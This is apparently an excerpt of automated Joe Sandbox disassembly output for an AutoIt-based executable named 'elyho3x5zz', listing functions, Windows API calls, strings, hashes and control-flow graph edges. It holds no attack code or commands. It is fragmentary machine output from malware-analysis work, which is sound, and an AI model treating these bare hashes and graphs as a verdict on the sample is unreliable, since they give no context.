      • String ID: TaskbarCreated
      • API String ID: 129472671-2362178303
      • Opcode ID: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
      • Instruction ID: 2cd94041480b0fb388e100e482e843c06373b9d63b8c965817da33eb84b39f99
      • Opcode Fuzzy Hash: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
      • Instruction Fuzzy Hash: 8C514B3AD0C657A6F620BB14F847179F765AF95B90FC404B1D48D826AADE6CF504B330

      Control-flow Graph

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
      • String ID: AutoIt v3 GUI$TaskbarCreated
      • API String ID: 2914291525-2659433951
      • Opcode ID: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
      • Instruction ID: 64ffdbd322ca009c7f6b03dc590aecbff5a36351d3a13a0ae44361a9d9bd3f25
      • Opcode Fuzzy Hash: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
      • Instruction Fuzzy Hash: 14315A3AA08B01AAF700DF60E8453A977B8FB84748F900178DA9D57B64DF7CD159EB50

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 189 7ff73a1ee958-7ff73a1ee9ae 190 7ff73a1ee9b4-7ff73a1ee9d3 mciSendStringW 189->190 191 7ff73a2327e4-7ff73a2327ea DestroyWindow 189->191 192 7ff73a1eecbd-7ff73a1eecce 190->192 193 7ff73a1ee9d9-7ff73a1ee9e3 190->193 194 7ff73a2327f0-7ff73a232801 191->194 196 7ff73a1eecd0-7ff73a1eecf0 UnregisterHotKey 192->196 197 7ff73a1eecf7-7ff73a1eed01 192->197 193->194 195 7ff73a1ee9e9 193->195 199 7ff73a232835-7ff73a23283f 194->199 200 7ff73a232803-7ff73a232806 194->200 198 7ff73a1ee9f0-7ff73a1ee9f3 195->198 196->197 201 7ff73a1eecf2 call 7ff73a1ef270 196->201 197->193 202 7ff73a1eed07 197->202 203 7ff73a1eecb0-7ff73a1eecb8 call 7ff73a1d5410 198->203 204 7ff73a1ee9f9-7ff73a1eea08 call 7ff73a1d3aa8 198->204 199->194 208 7ff73a232841 199->208 205 7ff73a232808-7ff73a232811 call 7ff73a1d8314 200->205 206 7ff73a232813-7ff73a232817 FindClose 200->206 201->197 202->192 203->198 218 7ff73a1eea0f-7ff73a1eea12 204->218 212 7ff73a23281d-7ff73a23282e 205->212 206->212 217 7ff73a232846-7ff73a23284f call 7ff73a268c00 208->217 212->199 216 7ff73a232830 call 7ff73a253180 212->216 216->199 217->218 218->217 222 7ff73a1eea18 218->222 223 7ff73a1eea1f-7ff73a1eea22 222->223 224 7ff73a232854-7ff73a23285d call 7ff73a2446cc 223->224 225 7ff73a1eea28-7ff73a1eea32 223->225 224->223 227 7ff73a232862-7ff73a232873 225->227 228 7ff73a1eea38-7ff73a1eea42 225->228 230 7ff73a23287b-7ff73a232885 227->230 231 7ff73a232875 FreeLibrary 227->231 232 7ff73a23288c-7ff73a23289d 228->232 233 7ff73a1eea48-7ff73a1eea76 call 7ff73a1e13e0 228->233 230->227 234 7ff73a232887 230->234 231->230 235 7ff73a2328c9-7ff73a2328d3 232->235 236 7ff73a23289f-7ff73a2328c2 VirtualFree 232->236 242 7ff73a1eeabf-7ff73a1eeacc OleUninitialize 233->242 243 7ff73a1eea78 233->243 234->232 235->232 240 7ff73a2328d5 235->240 236->235 238 7ff73a2328c4 call 7ff73a25321c 236->238 238->235 244 7ff73a2328da-7ff73a2328de 240->244 242->244 245 7ff73a1eead2-7ff73a1eead9 242->245 246 7ff73a1eea7d-7ff73a1eeabd call 7ff73a1ef1c4 call 7ff73a1ef13c 243->246 244->245 247 7ff73a2328e4-7ff73a2328ef 244->247 248 7ff73a1eeadf-7ff73a1eeaea 245->248 249 7ff73a2328f4-7ff73a232903 call 7ff73a2531d4 245->249 246->242 247->245 253 7ff73a1eeaf0-7ff73a1eeb22 call 7ff73a1da07c call 7ff73a1ef08c call 7ff73a1d39bc 248->253 254 7ff73a1eed09-7ff73a1eed18 call 7ff73a1f42a0 248->254 261 7ff73a232905 249->261 273 7ff73a1eeb24-7ff73a1eeb29 call 7ff73a1f4c24 253->273 274 7ff73a1eeb2e-7ff73a1eebc4 call 7ff73a1d39bc call 7ff73a1da07c call 7ff73a1d45c8 * 2 call 7ff73a1da07c * 3 call 7ff73a1e13e0 call 7ff73a1eee68 call 7ff73a1eee2c * 3 253->274 254->253 265 7ff73a1eed1e 254->265 266 7ff73a23290a-7ff73a232919 call 7ff73a243a78 261->266 265->254 272 7ff73a23291b 266->272 278 7ff73a232920-7ff73a23292f call 7ff73a1ee4e4 272->278 273->274 274->266 316 7ff73a1eebca-7ff73a1eebdc call 7ff73a1d39bc 274->316 283 7ff73a232931 278->283 286 7ff73a232936-7ff73a232945 call 7ff73a253078 283->286 292 7ff73a232947 286->292 295 7ff73a23294c-7ff73a23295b call 7ff73a2531a8 292->295 301 7ff73a23295d 295->301 305 7ff73a232962-7ff73a232971 call 7ff73a2531a8 301->305 310 7ff73a232973 305->310 310->310 316->278 319 7ff73a1eebe2-7ff73a1eebec 316->319 319->286 320 7ff73a1eebf2-7ff73a1eec08 call 7ff73a1da07c 319->320 323 7ff73a1eed20-7ff73a1eed25 call 7ff73a1f4c24 320->323 324 7ff73a1eec0e-7ff73a1eec18 320->324 323->191 325 7ff73a1eec8a-7ff73a1eec91 call 7ff73a1da07c 324->325 326 7ff73a1eec1a-7ff73a1eec24 324->326 332 7ff73a1eec96-7ff73a1eeca9 call 7ff73a1f4c24 325->332 326->295 328 7ff73a1eec2a-7ff73a1eec3b 326->328 328->305 331 7ff73a1eec41-7ff73a1eed71 call 7ff73a1da07c * 3 call 7ff73a1eee10 call 7ff73a1eed8c 328->331 347 7ff73a232978-7ff73a232987 call 7ff73a25d794 331->347 348 7ff73a1eed77-7ff73a1eed88 331->348 332->325 338 7ff73a1eecab 332->338 338->326 351 7ff73a232989 347->351 351->351
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: DestroySendStringUninitializeUnregisterWindow
      • String ID: close all
      • API String ID: 1992507300-3243417748
      • Opcode ID: 68229fdcb89769e1228b851cc7905b8c17c6978382eb60648c185bbdcfdab8ab
      • Instruction ID: 1b6b91250ef127bb6d6d37b19bfd189cd1458ebf4ed18480151e8541c6c22c41
      • Opcode Fuzzy Hash: 68229fdcb89769e1228b851cc7905b8c17c6978382eb60648c185bbdcfdab8ab
      • Instruction Fuzzy Hash: 1AE1652AB09902A1FE58FF16D15267CA360BFA4B44F9440B5DB0E572D1DF3DE862E720

      Control-flow Graph

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
      • String ID: AutoIt v3
      • API String ID: 423443420-1704141276
      • Opcode ID: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
      • Instruction ID: aa4909c4f0c62e4334be1ec4fcf3a87905bdadafee5abf6cb0672a09eca67404
      • Opcode Fuzzy Hash: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
      • Instruction Fuzzy Hash: 9A31373AA08B42AAF710EB91F8463A9B378FB88759F800179DD8D43B14DF7CD155A720

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 419 7ff73a217348-7ff73a2173ba call 7ff73a217078 422 7ff73a2173bc-7ff73a2173c4 call 7ff73a2055b4 419->422 423 7ff73a2173d3-7ff73a2173dd call 7ff73a20e418 419->423 428 7ff73a2173c7-7ff73a2173ce call 7ff73a2055d4 422->428 429 7ff73a2173f7-7ff73a217463 CreateFileW 423->429 430 7ff73a2173df-7ff73a2173f5 call 7ff73a2055b4 call 7ff73a2055d4 423->430 443 7ff73a21771a-7ff73a217736 428->443 433 7ff73a217469-7ff73a217470 429->433 434 7ff73a2174eb-7ff73a2174f6 GetFileType 429->434 430->428 435 7ff73a2174b8-7ff73a2174e6 GetLastError call 7ff73a205564 433->435 436 7ff73a217472-7ff73a217476 433->436 438 7ff73a2174f8-7ff73a217533 GetLastError call 7ff73a205564 CloseHandle 434->438 439 7ff73a217549-7ff73a21754f 434->439 435->428 436->435 441 7ff73a217478-7ff73a2174b6 CreateFileW 436->441 438->428 454 7ff73a217539-7ff73a217544 call 7ff73a2055d4 438->454 446 7ff73a217551-7ff73a217554 439->446 447 7ff73a217556-7ff73a217559 439->447 441->434 441->435 451 7ff73a21755e-7ff73a2175ac call 7ff73a20e334 446->451 447->451 452 7ff73a21755b 447->452 457 7ff73a2175ae-7ff73a2175ba call 7ff73a217284 451->457 458 7ff73a2175c0-7ff73a2175ea call 7ff73a216de4 451->458 452->451 454->428 464 7ff73a2175bc 457->464 465 7ff73a2175ef-7ff73a2175f9 call 7ff73a2104b8 457->465 466 7ff73a2175ec 458->466 467 7ff73a2175fe-7ff73a217643 458->467 464->458 465->443 466->465 469 7ff73a217665-7ff73a217671 467->469 470 7ff73a217645-7ff73a217649 467->470 472 7ff73a217677-7ff73a21767b 469->472 473 7ff73a217718 469->473 470->469 471 7ff73a21764b-7ff73a217660 470->471 471->469 472->473 475 7ff73a217681-7ff73a2176c9 CloseHandle CreateFileW 472->475 473->443 476 7ff73a2176cb-7ff73a2176f9 GetLastError call 7ff73a205564 call 7ff73a20e548 475->476 477 7ff73a2176fe-7ff73a217713 475->477 476->477 477->473
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
      • String ID:
      • API String ID: 1617910340-0
      • Opcode ID: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
      • Instruction ID: d1684edf5d4afc906a1cefa0900412c8255d50049392b87181057cffcd0ab2f9
      • Opcode Fuzzy Hash: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
      • Instruction Fuzzy Hash: 52C1E03AB18A419AFB10EF64D8423AC7761EB89BA8F405275DE2E5B7D5CF38D011E710

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 557 7ff73a1e25bc-7ff73a1e263d 561 7ff73a1e2643-7ff73a1e267c 557->561 562 7ff73a1e287e-7ff73a1e28af 557->562 563 7ff73a1e2680-7ff73a1e2687 561->563 565 7ff73a1e2856-7ff73a1e2876 563->565 566 7ff73a1e268d-7ff73a1e26a1 563->566 565->562 568 7ff73a22d148-7ff73a22d14f 566->568 569 7ff73a1e26a7-7ff73a1e26bc 566->569 570 7ff73a1e2702-7ff73a1e2723 568->570 571 7ff73a22d155 568->571 572 7ff73a1e26c2-7ff73a1e26c9 569->572 573 7ff73a1e29c8-7ff73a1e29eb PeekMessageW 569->573 589 7ff73a1e2725-7ff73a1e272c 570->589 590 7ff73a1e276e-7ff73a1e27d2 570->590 578 7ff73a22d15a-7ff73a22d160 571->578 572->573 576 7ff73a1e26cf-7ff73a1e26d4 572->576 574 7ff73a1e29f1-7ff73a1e29f5 573->574 575 7ff73a1e26e8-7ff73a1e26ef 573->575 579 7ff73a22d1aa-7ff73a22d1bb 574->579 580 7ff73a1e29fb-7ff73a1e2a05 574->580 582 7ff73a1e26f5-7ff73a1e26fc 575->582 583 7ff73a22e285-7ff73a22e293 575->583 576->573 581 7ff73a1e26da-7ff73a1e26e2 GetInputState 576->581 585 7ff73a22d19b 578->585 586 7ff73a22d162-7ff73a22d176 578->586 579->575 580->578 587 7ff73a1e2a0b-7ff73a1e2a1d call 7ff73a1f2de8 580->587 581->573 581->575 582->570 588 7ff73a22e29d-7ff73a22e2b5 call 7ff73a1ef1c4 582->588 583->588 585->579 586->585 591 7ff73a22d178-7ff73a22d17f 586->591 605 7ff73a1e2a33-7ff73a1e2a4f PeekMessageW 587->605 606 7ff73a1e2a1f-7ff73a1e2a2d TranslateMessage DispatchMessageW 587->606 588->565 589->590 595 7ff73a1e272e-7ff73a1e2738 589->595 625 7ff73a1e27d8-7ff73a1e27da 590->625 626 7ff73a22e276 590->626 591->585 598 7ff73a22d181-7ff73a22d190 TranslateAcceleratorW 591->598 596 7ff73a1e273f-7ff73a1e2742 595->596 601 7ff73a1e28b0-7ff73a1e28b7 596->601 602 7ff73a1e2748 596->602 598->587 604 7ff73a22d196 598->604 609 7ff73a1e28eb-7ff73a1e28ef 601->609 610 7ff73a1e28b9-7ff73a1e28cc timeGetTime 601->610 608 7ff73a1e274f-7ff73a1e2752 602->608 604->605 605->575 611 7ff73a1e2a55 605->611 606->605 613 7ff73a1e28f4-7ff73a1e28fb 608->613 614 7ff73a1e2758-7ff73a1e2761 608->614 609->596 615 7ff73a22d2ab-7ff73a22d2b0 610->615 616 7ff73a1e28d2-7ff73a1e28d7 610->616 611->574 617 7ff73a22d2f8-7ff73a22d303 613->617 618 7ff73a1e2901-7ff73a1e2905 613->618 620 7ff73a22d4c7-7ff73a22d4ce 614->620 621 7ff73a1e2767 614->621 622 7ff73a1e28dc-7ff73a1e28e5 615->622 623 7ff73a22d2b6 615->623 616->622 624 7ff73a1e28d9 616->624 627 7ff73a22d309-7ff73a22d30c 617->627 628 7ff73a22d305 617->628 618->608 621->590 622->609 629 7ff73a22d2bb-7ff73a22d2f3 timeGetTime call 7ff73a1f2ac0 call 7ff73a253a28 622->629 623->629 624->622 625->626 631 7ff73a1e27e0-7ff73a1e27ee 625->631 626->583 632 7ff73a22d30e 627->632 633 7ff73a22d312-7ff73a22d319 627->633 628->627 629->609 631->626 635 7ff73a1e27f4-7ff73a1e2819 631->635 632->633 636 7ff73a22d31b 633->636 637 7ff73a22d322-7ff73a22d329 633->637 639 7ff73a1e281f-7ff73a1e2829 call 7ff73a1e2b70 635->639 640 7ff73a1e290a-7ff73a1e290d 635->640 636->637 641 7ff73a22d32b 637->641 642 7ff73a22d332-7ff73a22d33d call 7ff73a1f42a0 637->642 651 7ff73a1e282e-7ff73a1e2836 639->651 644 7ff73a1e290f-7ff73a1e291a call 7ff73a1e2e30 640->644 645 7ff73a1e2931-7ff73a1e2933 640->645 641->642 642->602 642->620 644->651 649 7ff73a1e2935-7ff73a1e2949 call 7ff73a1e66c0 645->649 650 7ff73a1e2971-7ff73a1e2974 645->650 663 7ff73a1e294e-7ff73a1e2950 649->663 657 7ff73a22dfbe-7ff73a22dfc0 650->657 658 7ff73a1e297a-7ff73a1e2997 call 7ff73a1e01a0 650->658 655 7ff73a1e283c 651->655 656 7ff73a1e299e-7ff73a1e29ab 651->656 664 7ff73a1e2840-7ff73a1e2843 655->664 659 7ff73a1e29b1-7ff73a1e29be call 7ff73a1f4c24 656->659 660 7ff73a22e181-7ff73a22e197 call 7ff73a1f4c24 * 2 656->660 661 7ff73a22dfed-7ff73a22dff6 657->661 662 7ff73a22dfc2-7ff73a22dfc5 657->662 674 7ff73a1e299c 658->674 659->573 660->626 669 7ff73a22dff8-7ff73a22e003 661->669 670 7ff73a22e005-7ff73a22e00c 661->670 662->664 668 7ff73a22dfcb-7ff73a22dfe7 call 7ff73a1e3c20 662->668 663->651 671 7ff73a1e2956-7ff73a1e2966 663->671 672 7ff73a1e2b17-7ff73a1e2b1d 664->672 673 7ff73a1e2849-7ff73a1e2850 664->673 668->661 678 7ff73a22e00f-7ff73a22e016 call 7ff73a268b98 669->678 670->678 671->651 679 7ff73a1e296c 671->679 672->673 680 7ff73a1e2b23-7ff73a1e2b2d 672->680 673->563 673->565 674->663 689 7ff73a22e0d7-7ff73a22e0d9 678->689 690 7ff73a22e01c-7ff73a22e036 call 7ff73a2534e4 678->690 684 7ff73a22e0f4-7ff73a22e10e call 7ff73a2534e4 679->684 680->568 691 7ff73a22e147-7ff73a22e14e 684->691 692 7ff73a22e110-7ff73a22e11d 684->692 693 7ff73a22e0db 689->693 694 7ff73a22e0df-7ff73a22e0ee call 7ff73a26a320 689->694 705 7ff73a22e038-7ff73a22e045 690->705 706 7ff73a22e06f-7ff73a22e076 690->706 691->673 698 7ff73a22e154-7ff73a22e15a 691->698 696 7ff73a22e11f-7ff73a22e130 call 7ff73a1f4c24 * 2 692->696 697 7ff73a22e135-7ff73a22e142 call 7ff73a1f4c24 692->697 693->694 694->684 696->697 697->691 698->673 703 7ff73a22e160-7ff73a22e169 698->703 703->660 707 7ff73a22e047-7ff73a22e058 call 7ff73a1f4c24 * 2 705->707 708 7ff73a22e05d-7ff73a22e06a call 7ff73a1f4c24 705->708 706->673 710 7ff73a22e07c-7ff73a22e082 706->710 707->708 708->706 710->673 715 7ff73a22e088-7ff73a22e091 710->715 715->689
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Message$Peek$DispatchInputStateTimeTranslatetime
      • String ID:
      • API String ID: 3249950245-0
      • Opcode ID: 5ebdb979b28160a23f49629197f1ccdf04f56b681ab297a5cb476022dd174858
      • Instruction ID: f37785e46bd6dd617fefcfc5a7255fa87b9a7925899d8890c3a29b000385db47
      • Opcode Fuzzy Hash: 5ebdb979b28160a23f49629197f1ccdf04f56b681ab297a5cb476022dd174858
      • Instruction Fuzzy Hash: CA22E53AA0C68697FB68AB20E4527B9E7B0FB95744F940175DA4E43695CF3CE440F720

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 719 7ff73a1d3cbc-7ff73a1d3d88 CreateWindowExW * 2 ShowWindow * 2
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Window$Create$Show
      • String ID: AutoIt v3$d$edit
      • API String ID: 2813641753-2600919596
      • Opcode ID: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
      • Instruction ID: 3685fec164eaaf12831b85dbec0a3a32f86b216b289c78dd3745748f38014189
      • Opcode Fuzzy Hash: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
      • Instruction Fuzzy Hash: 00218C76A2CB41DAF710DB10F84A72AB3E0F788799F804278EA8D46654CFBDC145EB10

      Control-flow Graph

      APIs
        • Part of subcall function 00007FF73A1F2D5C: MapVirtualKeyW.USER32(?,?,?,00007FF73A1D7FA5), ref: 00007FF73A1F2D8E
        • Part of subcall function 00007FF73A1F2D5C: MapVirtualKeyW.USER32(?,?,?,00007FF73A1D7FA5), ref: 00007FF73A1F2D9C
        • Part of subcall function 00007FF73A1F2D5C: MapVirtualKeyW.USER32(?,?,?,00007FF73A1D7FA5), ref: 00007FF73A1F2DAC
        • Part of subcall function 00007FF73A1F2D5C: MapVirtualKeyW.USER32(?,?,?,00007FF73A1D7FA5), ref: 00007FF73A1F2DBC
        • Part of subcall function 00007FF73A1F2D5C: MapVirtualKeyW.USER32(?,?,?,00007FF73A1D7FA5), ref: 00007FF73A1F2DCA
        • Part of subcall function 00007FF73A1F2D5C: MapVirtualKeyW.USER32(?,?,?,00007FF73A1D7FA5), ref: 00007FF73A1F2DD8
        • Part of subcall function 00007FF73A1EEEC8: RegisterWindowMessageW.USER32 ref: 00007FF73A1EEF76
      • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF73A1D106D), ref: 00007FF73A1D8209
      • OleInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF73A1D106D), ref: 00007FF73A1D828F
      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF73A1D106D), ref: 00007FF73A21D36A
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
      • String ID: AutoIt
      • API String ID: 1986988660-2515660138
      • Opcode ID: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
      • Instruction ID: 72bdae3ca36e15029f9bf39897a5db1996f70645535de1e8b608f75808eab65b
      • Opcode Fuzzy Hash: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
      • Instruction Fuzzy Hash: 88C1E379D1DB52A5F640EF14E882078F7A8BFD4340FA042BAD49D42A61DF7CA245F7A0

      Control-flow Graph

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: IconLoadNotifyShell_Stringwcscpy
      • String ID: Line:
      • API String ID: 3135491444-1585850449
      • Opcode ID: 1bf3ee93fc45a1699e44ee0231c4e24a40c79c0c321c71349712c6b358204ebc
      • Instruction ID: fad7602e9d77208656cf54a0a6df1cb262ab86075fbf4f571403ffc8503d6478
      • Opcode Fuzzy Hash: 1bf3ee93fc45a1699e44ee0231c4e24a40c79c0c321c71349712c6b358204ebc
      • Instruction Fuzzy Hash: 1541332B60C686B6F720FB10E4422B9B371FB85384FC450B1DA8C02699DE7CD544E760

      Control-flow Graph

      APIs
      • GetOpenFileNameW.COMDLG32 ref: 00007FF73A21BAA2
        • Part of subcall function 00007FF73A1D56D4: GetFullPathNameW.KERNEL32(?,00007FF73A1D56C1,?,00007FF73A1D7A0C,?,?,?,00007FF73A1D109E), ref: 00007FF73A1D56FF
        • Part of subcall function 00007FF73A1D3EB4: GetLongPathNameW.KERNELBASE ref: 00007FF73A1D3ED8
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Name$Path$FileFullLongOpen
      • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
      • API String ID: 779396738-2360590182
      • Opcode ID: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
      • Instruction ID: 9e819b4590d84af6d8f917ad5adcf5c2f7b7f91b58fd9dfeb15db63d8b5388ce
      • Opcode Fuzzy Hash: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
      • Instruction Fuzzy Hash: 9431CF36608B8299F710EF21E8411A8B7B4FB89B84F9441B5DE8C03B55CF3CD144D710
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
